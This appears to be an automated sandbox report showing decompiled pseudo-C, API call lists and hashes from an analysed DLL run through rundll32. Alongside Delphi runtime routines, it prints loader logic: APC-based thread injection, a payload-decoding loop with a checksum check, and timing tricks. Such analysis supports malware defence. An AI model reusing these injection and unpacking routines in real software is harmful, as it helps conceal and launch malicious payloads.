GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00E156AB
lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00E156D6
lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00E1571D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00E1572D
lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00E15755
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00E15765
lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 00E1578B
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 00E1579B

Strings

Software\Borland\Delphi\Locales, xrefs: 00E155E8
Software\Borland\Locales, xrefs: 00E155AC, 00E155CA
., xrefs: 00E156E8

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-3917250287
Opcode ID: 697760e5f2cace74e049a4a856e4809f3d5c0b8a5755b7029ca773f5d6a08362
Instruction ID: 994781d67519257a69430539e65b07e56337562c05cefb583946761509a24ad8
Opcode Fuzzy Hash: 697760e5f2cace74e049a4a856e4809f3d5c0b8a5755b7029ca773f5d6a08362
Instruction Fuzzy Hash: B3514E72A4065CBEEB21D6A49C47FEF77EC9B44744F4410A2B704F61C1E6749AC4DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00E15688 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98
stringlibrarythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E00E15688() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00E112A4();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00E112AC();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00E112A4();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00E112A4();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00E112A4();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}

0x00e15688
0x00e15690
0x00e15697
0x00e15698
0x00e156ab
0x00e156b0
0x00e156b9
0x00e157a2
0x00e157a9
0x00e156cf
0x00e156cf
0x00e156d5
0x00e156d6
0x00e156e3
0x00e156e8
0x00e156eb
0x00e156e7
0x00000000
0x00e156e7
0x00e156f7
0x00e156ff
0x00e15705
0x00e1570a
0x00e15717
0x00e1571b
0x00e1571c
0x00e1571d
0x00e15732
0x00e15732
0x00e15736
0x00e1574f
0x00e15753
0x00e15754
0x00e15755
0x00e15765
0x00e1576a
0x00e1576e
0x00e15770
0x00e15785
0x00e15789
0x00e1578a
0x00e1578b
0x00e1579b
0x00e157a0
0x00e157a0
0x00e1576e
0x00e15736
0x00000000
0x00e156ff

APIs

lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00E15698
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00E156A5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00E156AB
lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00E156D6
lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00E1571D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00E1572D
lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00E15755
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00E15765
lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 00E1578B
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 00E1579B

Strings

Software\Borland\Delphi\Locales, xrefs: 00E155E8
Software\Borland\Locales, xrefs: 00E155AC, 00E155CA
., xrefs: 00E156E8

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-3917250287
Opcode ID: f4459cf87ed291fb2a575206f38d6fd66bf53e6807e9aaa246dd4c316f24e6e8
Instruction ID: b9214f82c7429c8b81dbb749b8096b1656d3b97e70bce6708b56e5a85567fa1a
Opcode Fuzzy Hash: f4459cf87ed291fb2a575206f38d6fd66bf53e6807e9aaa246dd4c316f24e6e8
Instruction Fuzzy Hash: 14318172E0066CAAEB25D6B8DC46BEE67EC8B44344F4811E2A604F61C1E6749EC4CF90

Uniqueness

Uniqueness Score: -1.00%

Function 010814BA Relevance: 13.6, APIs: 9, Instructions: 120
sleepnativesynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E010814BA(char _a4) {
				long _v8;
				long _v12;
				char _v36;
				void* __edi;
				long _t25;
				long _t27;
				long _t28;
				long _t32;
				intOrPtr _t40;
				signed int _t44;
				signed int _t45;
				long _t50;
				intOrPtr _t52;
				signed int _t53;
				void* _t57;
				void* _t60;
				signed int _t62;
				signed int _t63;
				void* _t67;
				intOrPtr* _t68;

				_t25 = E01081DDF();
				_v8 = _t25;
				if(_t25 != 0) {
					return _t25;
				}
				do {
					_t62 = 0;
					_v12 = 0;
					_t50 = 0x30;
					do {
						_t57 = E01081B28(_t50);
						if(_t57 == 0) {
							_v8 = 8;
						} else {
							_t44 = NtQuerySystemInformation(8, _t57, _t50,  &_v12); // executed
							_t53 = _t44;
							_t45 = _t44 & 0x0000ffff;
							_v8 = _t45;
							if(_t45 == 4) {
								_t50 = _t50 + 0x30;
							}
							_t63 = 0x13;
							_t10 = _t53 + 1; // 0x1
							_t62 =  *_t57 % _t63 + _t10;
							E01081B13(_t57);
						}
					} while (_v8 != 0);
					_t27 = E01081883(_t57, _t62); // executed
					_v8 = _t27;
					Sleep(_t62 << 4); // executed
					_t28 = _v8;
				} while (_t28 == 9);
				if(_t28 != 0) {
					L25:
					return _t28;
				}
				if(_a4 != 0) {
					L18:
					_push(0);
					_t67 = E01081E53(E01081C65,  &_v36);
					if(_t67 == 0) {
						_v8 = GetLastError();
					} else {
						_t32 = WaitForSingleObject(_t67, 0xffffffff);
						_v8 = _t32;
						if(_t32 == 0) {
							GetExitCodeThread(_t67,  &_v8);
						}
						CloseHandle(_t67);
					}
					_t28 = _v8;
					if(_t28 == 0xffffffff) {
						_t28 = GetLastError();
					}
					goto L25;
				}
				if(E01081098(_t53,  &_a4) != 0) {
					 *0x10841b8 = 0;
					goto L18;
				}
				_t52 = _a4;
				_t68 = __imp__GetLongPathNameW;
				_t60 =  *_t68(_t52, 0, 0);
				if(_t60 == 0) {
					L16:
					 *0x10841b8 = _t52;
					goto L18;
				}
				_t19 = _t60 + 2; // 0x2
				_t40 = E01081B28(_t60 + _t19);
				 *0x10841b8 = _t40;
				if(_t40 == 0) {
					goto L16;
				}
				 *_t68(_t52, _t40, _t60);
				E01081B13(_t52);
				goto L18;
			}

0x010814c0
0x010814c7
0x010814ca
0x010815f5
0x010815f5
0x010814d3
0x010814d3
0x010814d7
0x010814da
0x010814db
0x010814e1
0x010814e5
0x0108151c
0x010814e7
0x010814ef
0x010814f5
0x010814f7
0x010814ff
0x01081502
0x01081504
0x01081504
0x0108150b
0x01081511
0x01081511
0x01081515
0x01081515
0x01081523
0x0108152a
0x01081533
0x01081536
0x0108153c
0x0108153f
0x01081548
0x010815f1
0x00000000
0x010815f3
0x01081551
0x010815a2
0x010815a2
0x010815b8
0x010815bc
0x010815e4
0x010815be
0x010815c1
0x010815c9
0x010815cc
0x010815d3
0x010815d3
0x010815da
0x010815da
0x010815e7
0x010815ed
0x010815ef
0x010815ef
0x00000000
0x010815ed
0x0108155e
0x0108159c
0x00000000
0x0108159c
0x01081560
0x01081565
0x0108156e
0x01081572
0x01081594
0x01081594
0x00000000
0x01081594
0x01081574
0x01081579
0x01081580
0x01081585
0x00000000
0x00000000
0x0108158a
0x0108158d
0x00000000

APIs

Part of subcall function 01081DDF: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,010814C5), ref: 01081DEE
Part of subcall function 01081DDF: GetVersion.KERNEL32 ref: 01081DFD
Part of subcall function 01081DDF: GetCurrentProcessId.KERNEL32 ref: 01081E14
Part of subcall function 01081DDF: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 01081E2D

Part of subcall function 01081B28: HeapAlloc.KERNEL32(00000000,?,010814E1,00000030,751463F0,00000000), ref: 01081B34

NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 010814EF
Sleep.KERNELBASE(00000000,00000000,00000030,751463F0,00000000), ref: 01081536
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0108156C
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0108158A
WaitForSingleObject.KERNEL32(00000000,000000FF,01081C65,?,00000000), ref: 010815C1
GetExitCodeThread.KERNEL32(00000000,00000000), ref: 010815D3
CloseHandle.KERNEL32(00000000), ref: 010815DA
GetLastError.KERNEL32(01081C65,?,00000000), ref: 010815E2
GetLastError.KERNEL32 ref: 010815EF

Memory Dump Source

Source File: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true

Associated: 00000003.00000002.315796531.0000000001085000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1080000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLastLongNamePathProcess$AllocCloseCodeCreateCurrentEventExitHandleHeapInformationObjectOpenQuerySingleSleepSystemThreadVersionWait
String ID:
API String ID: 3479304935-0
Opcode ID: 606a530a4ad552242b5603b47b623f4b371201bed60437db29d1569f34a91829
Instruction ID: 8ea3fa7c5eadd66cb2aba8a9d02a5ade18fb4d0dc1c2d855e859c19522841f7b
Opcode Fuzzy Hash: 606a530a4ad552242b5603b47b623f4b371201bed60437db29d1569f34a91829
Instruction Fuzzy Hash: 8931B171908215EFDB61FBA9D884AAE7AECEF44760F144166F5C6D7140EB34CA438BB0

Uniqueness

Uniqueness Score: -1.00%

Function 010817A7 Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x1084188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x108418c;
						if( *0x108418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x1084198;
								if( *0x1084198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x108418c);
						}
						HeapDestroy( *0x1084190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x1084188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x1084190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x10841b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E01081E53(E01082093, E01082042(_a12, 1, 0x1084198, _t41));
							 *0x108418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x010817aa
0x010817b6
0x010817b8
0x010817bb
0x01081831
0x01081837
0x01081839
0x0108183b
0x01081841
0x01081843
0x01081848
0x0108184b
0x01081856
0x01081858
0x00000000
0x00000000
0x0108185a
0x0108185d
0x0108185f
0x00000000
0x00000000
0x00000000
0x0108185f
0x01081867
0x01081867
0x01081873
0x01081873
0x010817bd
0x010817be
0x010817de
0x010817e4
0x010817e6
0x010817eb
0x01081827
0x01081827
0x010817ed
0x010817f5
0x010817fc
0x01081806
0x01081812
0x01081819
0x0108181e
0x01081823
0x00000000
0x01081823
0x0108181e
0x010817eb
0x010817be
0x01081880

APIs

InterlockedIncrement.KERNEL32(01084188), ref: 010817C9
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 010817DE

Part of subcall function 01081E53: CreateThread.KERNELBASE ref: 01081E6A
Part of subcall function 01081E53: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 01081E7F
Part of subcall function 01081E53: GetLastError.KERNEL32(00000000), ref: 01081E8A
Part of subcall function 01081E53: TerminateThread.KERNEL32(00000000,00000000), ref: 01081E94
Part of subcall function 01081E53: CloseHandle.KERNEL32(00000000), ref: 01081E9B
Part of subcall function 01081E53: SetLastError.KERNEL32(00000000), ref: 01081EA4

InterlockedDecrement.KERNEL32(01084188), ref: 01081831
SleepEx.KERNEL32(00000064,00000001), ref: 0108184B
CloseHandle.KERNEL32 ref: 01081867
HeapDestroy.KERNEL32 ref: 01081873

Memory Dump Source

Source File: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true

Associated: 00000003.00000002.315796531.0000000001085000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1080000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 2f830e852b9a8ec18610ec54b56410977d3816ae1c0e24178a6be66d7ca005ea
Instruction ID: 77c18cf2f6d36d777a3a86b410127773fd7c86d1331bbac11f5a207db1342789
Opcode Fuzzy Hash: 2f830e852b9a8ec18610ec54b56410977d3816ae1c0e24178a6be66d7ca005ea
Instruction Fuzzy Hash: 61219D71B18206EFCB21AFADE885A5D7FE8FBA4B60B504479F5C5D6144E635C802CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01081E53 Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01081E53(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x10841cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x01081e6a
0x01081e70
0x01081e74
0x01081e7f
0x01081e87
0x01081e90
0x01081e94
0x01081e9b
0x01081ea2
0x01081ea4
0x01081eaa
0x01081e87
0x01081eae

APIs

CreateThread.KERNELBASE ref: 01081E6A
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 01081E7F
GetLastError.KERNEL32(00000000), ref: 01081E8A
TerminateThread.KERNEL32(00000000,00000000), ref: 01081E94
CloseHandle.KERNEL32(00000000), ref: 01081E9B
SetLastError.KERNEL32(00000000), ref: 01081EA4

Memory Dump Source

Source File: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true

Associated: 00000003.00000002.315796531.0000000001085000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1080000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: ae4c2a7fc99a92baf3a018c24d0213f21e6b593a239a051eae82fdaf5e2dc10c
Instruction ID: 7914bf36553371474076e76e38c2a2d11e7f79f92bd83b19e25c23aeaba0fa9b
Opcode Fuzzy Hash: ae4c2a7fc99a92baf3a018c24d0213f21e6b593a239a051eae82fdaf5e2dc10c
Instruction Fuzzy Hash: C1F03A32208621AFD7325BA0AC28B4FBAA8BF88B41F004500F6C599154C72BC8029FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E11A0C Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00E11A0C() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00E11AC2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0xe7f5cc);
				L00E11360();
				if( *0xe7f04d != 0) {
					_push(0xe7f5cc);
					L00E11368();
				}
				E00E113D0(0xe7f5ec);
				E00E113D0(0xe7f5fc);
				E00E113D0(0xe7f628);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0xe7f624 = _t11;
				if( *0xe7f624 != 0) {
					_t13 = 3;
					do {
						_t20 =  *0xe7f624; // 0x901688
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0xe7f610)) = 0xe7f60c;
					 *0xe7f60c = 0xe7f60c;
					 *0xe7f618 = 0xe7f60c;
					 *0xe7f5c4 = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00E11AC9);
				if( *0xe7f04d != 0) {
					_push(0xe7f5cc);
					L00E11370();
					return 0;
				}
				return 0;
			}

0x00e11a11
0x00e11a12
0x00e11a17
0x00e11a1a
0x00e11a1d
0x00e11a22
0x00e11a2e
0x00e11a30
0x00e11a35
0x00e11a35
0x00e11a3f
0x00e11a49
0x00e11a53
0x00e11a5f
0x00e11a64
0x00e11a70
0x00e11a72
0x00e11a77
0x00e11a77
0x00e11a7f
0x00e11a83
0x00e11a84
0x00e11a90
0x00e11a93
0x00e11a95
0x00e11a9a
0x00e11a9a
0x00e11aa3
0x00e11aa6
0x00e11aa9
0x00e11ab5
0x00e11ab7
0x00e11abc
0x00000000
0x00e11abc
0x00e11ac1

APIs

RtlInitializeCriticalSection.KERNEL32(00E7F5CC,00000000,00E11AC2,?,?,00E122A6,00E7F60C,00000000,00000000,?,?,00E11C95,00E11CAA,00E11DFB), ref: 00E11A22
RtlEnterCriticalSection.KERNEL32(00E7F5CC,00E7F5CC,00000000,00E11AC2,?,?,00E122A6,00E7F60C,00000000,00000000,?,?,00E11C95,00E11CAA,00E11DFB), ref: 00E11A35
LocalAlloc.KERNEL32(00000000,00000FF8,00E7F5CC,00000000,00E11AC2,?,?,00E122A6,00E7F60C,00000000,00000000,?,?,00E11C95,00E11CAA,00E11DFB), ref: 00E11A5F
RtlLeaveCriticalSection.KERNEL32(00E7F5CC,00E11AC9,00000000,00E11AC2,?,?,00E122A6,00E7F60C,00000000,00000000,?,?,00E11C95,00E11CAA,00E11DFB), ref: 00E11ABC

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: c57615d81f78a951bef1046631a191ecd34dde750dd24e57fd20505bd6cf4871
Instruction ID: 31df2afb0da8e25ae78553d9e70f089c07bf194b6b3ef394e243ddf5ec53b93a
Opcode Fuzzy Hash: c57615d81f78a951bef1046631a191ecd34dde750dd24e57fd20505bd6cf4871
Instruction Fuzzy Hash: 500126706053405ED711EFA9D8067943BC0EB49B40F41B0F5E219F6AE2C5B44CC0CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01082093 Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E01082093(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E010814BA(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x0108209c
0x010820a1
0x010820af
0x010820b4
0x010820b4
0x010820ba
0x010820bf
0x010820c3
0x010820c7
0x010820c7
0x010820d1
0x010820da

APIs

GetCurrentThread.KERNEL32 ref: 01082096
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 010820A1
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 010820B4
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 010820C7

Memory Dump Source

Source File: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true

Associated: 00000003.00000002.315796531.0000000001085000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1080000_rundll32.jbxd

Yara matches

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 141c7f84a11c73a7604772712a1f3b934a2025ba5a84aff641975d4308c1eb1d
Instruction ID: c60d0dc9590e1138a9c887ac247bd8ce9d080c4ea9a2abaea3406fcad363747b
Opcode Fuzzy Hash: 141c7f84a11c73a7604772712a1f3b934a2025ba5a84aff641975d4308c1eb1d
Instruction Fuzzy Hash: E8E06D3120D6116BA2227A2D5C94E6F7B9DFF916307110325F6E0D62D0CB59C8038AA5

Uniqueness

Uniqueness Score: -1.00%

Function 01081883 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E01081883(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				void* _v20;
				unsigned int _v24;
				intOrPtr _v28;
				char _v32;
				void* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v52;
				signed int _v56;
				intOrPtr _t52;
				void* _t59;
				intOrPtr _t60;
				intOrPtr _t70;
				signed int _t79;
				intOrPtr* _t84;
				intOrPtr _t87;
				void* _t88;
				intOrPtr _t91;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t96;

				_t93 =  *0x10841b0;
				_t52 = E01081AA4(_t93,  &_v32,  &_v24);
				_v28 = _t52;
				if(_t52 == 0) {
					asm("sbb ebx, ebx");
					_t79 =  ~( ~(_v24 & 0x00000fff)) + (_v24 >> 0xc);
					_t94 = _t93 + _v32;
					_v44 = _t94;
					_t59 = VirtualAlloc(0, _t79 << 0xc, 0x3000, 4); // executed
					_v36 = _t59;
					if(_t59 == 0) {
						_v28 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t79 <= 0) {
							_t60 =  *0x10841cc;
						} else {
							_t87 = _a4;
							_v12 = _t94;
							_v12 = _v12 - _t59;
							_t16 = _t87 + 0x10851a7; // 0x10851a7
							_t88 = _t59 - _t94 + _t16;
							_v20 = _t59;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_v16 = 0x400;
								_t96 = 0;
								_t84 = _v20;
								_v40 = (_v56 ^ _v52) - _v8 + _v32 + _a4 - 1;
								do {
									_t70 =  *((intOrPtr*)(_v12 + _t84));
									_t91 = _t70;
									if(_t70 == 0) {
										_v16 = 1;
									} else {
										 *_t84 = _t70 + _t96 - _v40;
										_t96 = _t91;
										_t84 = _t84 + 4;
									}
									_t33 =  &_v16;
									 *_t33 = _v16 - 1;
								} while ( *_t33 != 0);
								_t35 = _t88 + 0xc; // 0xbed0c07d
								_t36 = _t88 + 8; // 0xeb423b03
								_v20 = _v20 + 0x1000;
								_t39 = _t88 + 4; // 0xcac4b65b
								_t60 =  *_t35 -  *_t36 +  *_t39;
								_v8 = _v8 + 1;
								 *0x10841cc = _t60;
							} while (_v8 < _t79);
						}
						if(_t60 != 0x69b25f44) {
							_v28 = 9;
						} else {
							E010820FB(_v24, _v36, _v44);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v28;
			}

0x0108188a
0x0108189a
0x010818a1
0x010818a4
0x010818b9
0x010818c0
0x010818c5
0x010818d6
0x010818d9
0x010818e1
0x010818e4
0x010819b6
0x010818ea
0x010818ea
0x010818f0
0x01081981
0x010818f6
0x010818f6
0x010818fd
0x01081900
0x01081903
0x01081903
0x0108190a
0x0108190e
0x01081919
0x0108191a
0x0108191b
0x01081922
0x0108192f
0x01081935
0x01081938
0x0108193b
0x0108193e
0x01081943
0x01081945
0x01081955
0x01081947
0x0108194c
0x0108194e
0x01081950
0x01081950
0x0108195c
0x0108195c
0x0108195c
0x01081961
0x01081964
0x01081967
0x0108196e
0x0108196e
0x01081971
0x01081977
0x01081977
0x0108197e
0x0108198b
0x0108199d
0x0108198d
0x01081996
0x01081996
0x010819ae
0x010819ae
0x010819bd
0x010819c3

APIs

VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,00000030,?,00000000,00000000,?,?,?,?,?,?,?,0108152F), ref: 010818D9
